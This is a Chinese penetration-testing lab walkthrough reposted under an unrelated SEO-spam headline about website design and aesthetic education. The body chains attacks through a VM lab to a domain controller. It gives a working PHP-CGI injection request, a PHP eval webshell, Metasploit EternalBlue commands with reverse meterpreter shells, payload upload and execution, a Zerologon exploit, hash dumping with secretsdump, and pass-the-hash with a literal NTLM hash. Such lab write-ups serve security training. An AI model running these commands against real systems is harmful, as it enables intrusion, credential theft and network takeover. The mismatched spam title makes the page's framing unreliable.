您的位置:首页 > 新闻 > 热点要闻 > 网站制作与美育融合_软文_移动广告平台_seo全国最好的公司

网站制作与美育融合_软文_移动广告平台_seo全国最好的公司

2025/1/10 9:31:49 来源:https://blog.csdn.net/m0_74402888/article/details/144879923  浏览:    关键词:网站制作与美育融合_软文_移动广告平台_seo全国最好的公司
网站制作与美育融合_软文_移动广告平台_seo全国最好的公司

相关帐号密码见虚拟机描述:

例课程演示:

vmware网卡设置:

vmware8/NAT 对应192.168.139.0网段

vmware2对应192.168.2.0网段

vmware3对应192.168.3.0网段

vmware10对应192.168.10.0网段

记得开启里面的xampp和weblogic服务在做实验

那么网络配置如下:

Windows Server 2012

配置NAT一块 + vmware2一块

Windows 7

配置vmware2

Windows 10

配置vmware2 + vmware3

Windows Server 2012 R2(weblogic 单机)

配置vmware3 + vmware11

Windows Server 2012-WEB

配置vmware11

Windows Server 2016-AD-2016

配置vmware11

一、外网打点PHP-GGC

1、cve-2024

https://blog.csdn.net/huangyongkang666/article/details/139659619

Poc

POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+allow_url_include%3Don+%ADd+auto_prepend_file%3Dphp%3A//input HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/122.0

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

Host: 127.0.0.1

Content-Type: application/x-www-form-urlencoded

Redirect-Status: 1

Content-Length: 22

<?php system('dir');?>

2、上线木马到哥斯拉

<?php file_put_contents('..\htdocs\xd.php','<?php eval($_POST["pass"]);?>');?>

3、上线哥斯拉

上传木马

3、端口扫描,扫描存活主机

目标2.128-win7

由于防火墙的原因扫描的端口没有扫描到

二、ms17010攻击

1、msf17010扫描

2、转发到msf

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost 0.0.0.0     #如果为云服务,则填写公网ip地址

set lport 1112        #cs上设置的

3、msf利用ms17010

run autoroute -p

run post/multi/manage/autoroute

 扫描模块位置:

 auxiliary/scanner/smb/smb_ms17_010    

 攻击代码位置:

 exploit/windows/smb/ms17_010_eternalblue

 exploit/windows/smb/ms17_010_eternalblue_win8  

 exploit/windows/smb/ms17_010_psexec            

 exploit/windows/smb/smb_doublepulsar_rce

!!防火墙原因,win10反向上线win7

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp   

//设置payload,后面是payload的的类型,可以通过 show payloads 命令查看

set RHOSTS 192.168.2.128     //设置被攻击者的IP

set lhost 192.168.2.140    //设置LHOST,也就是我们主机的ip,用于接收从目标机弹回来的shell,win7的2网段ip

set lport 1113

run

Msf上设置监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_http  //ms17010上一直的payload

set lhost 192.168.2.140     #kali上的

set lport 1113        #ms17010上的监听地址

use exploit/windows/smb/ms17_010_eternalblue

3、上线cs

转发上线

监听自己,反向上线

upload /home/kali/2.exe c:\\2.exe

execute -f c:\\2.exe

三、横向移动拿下win10

抓取明文报错

1、向下提权

Navicat密码凭证泄露

2、密码横向移动

创建正向监听器,由于win7限制入站不可以反向监听

四、win2012的weblogic漏洞利用

1、建立socks代理

注意为kali的

2、漏洞利用

3、转发上线

192.168.3.128

转发上线

五、win2012(10.10)横向移动

防火墙为win2012入站不允许,正向连接

六、拿下域控

Cve-2020-1472

1、建立代理

修改host文件

proxychains4 python3 cve-2020-1472-exploit.py dc 192.168.10.10

3、获取域内HASH:

proxychains4 python3 secretsdump.py dc\$@192.168.10.10 -just-dc -no-pass

python wmiexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21

使用administrator的hash值来连接DC

后续下载后门上线CS或者其他方式上线CS

4、横向移动拿下域控

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com